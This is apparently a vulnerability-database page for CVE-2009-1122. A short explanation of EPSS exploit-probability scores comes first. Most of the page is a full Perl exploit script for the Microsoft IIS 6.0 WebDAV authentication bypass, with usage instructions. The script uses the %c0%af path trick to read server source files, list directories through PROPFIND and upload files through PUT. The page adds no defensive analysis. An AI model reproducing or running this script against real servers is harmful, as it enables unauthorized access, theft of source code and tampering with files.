CVE-2009-1122 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl -W # # Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit # written by ka0x <ka0x01[alt+64]gmail.com> # Advisory: http://www.milw0rm.com/exploits/8765 # # Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others! use IO::Socket ; my ( $host, $path ) = @ARGV ; my $port = 80 ; # webserver port &usage unless $ARGV[1] ; $host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ; $path =~ s/\/// if(substr($path, 0,1) eq '/'); sub _file { $file = shift ; open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ; while( <FILE> ){ $cont .= $_ ; } close(FILE) ; return $cont ; } print "write 'help' for get help list\n"; while( 1 ) { my $sock = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ; print "\$> "; chomp( my $option = <STDIN> ) ; last if $option eq 'quit' ; if($option eq 'source') { $path =~ s/\//%c0%af\// ; print $sock "GET /".$path." HTTP/1.1\r\n" ; print $sock "Translate: f\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock "Connection: close\r\n\r\n" ; while(<$sock>){ print $_ ; } close($sock) ; } elsif($option eq 'path') { $path =~ s/\//%c0%af\// ; print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock "Connection:close\r\n" ; print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ; print $sock "Content-Length: 0\r\n\r\n" ; print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ; while(<$sock>){ print $_ ; } close($sock) ; } elsif($option eq 'put') { $path =~ s/\//%c0%af\// ; print "[*] Insert a local file (ex: /root/file.txt): " ; chomp( $local = <STDIN> ) ; $file_l = _file( $local ) ; print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ; print $sock "Connection:close\r\n" ; print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ; print $sock $file_l,"\r\n" ; while(<$sock>){ print $_ ; } close($sock) ; } elsif($option eq 'help') { print "\n\t\t- OPTIONS -\n\n\n" ; print "\thelp\t\tgive this help list\n" ; print "\tsource\t\tget file content\n" ; print "\tpath\t\tget directory contents\n" ; print "\tput\t\tput file\n" ; print "\tquit\t\texit exploit\n\n" ; } } sub usage { print << 'EOH' ; $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit $ written by ka0x <ka0x01[at]gmail.com> $ 25/05/2009 usage: perl $0 <host> <path> example: perl $0 localhost dir/ perl $0 localhost dir/file.txt EOH exit; } __END__ # milw0rm.com [2009-05-26]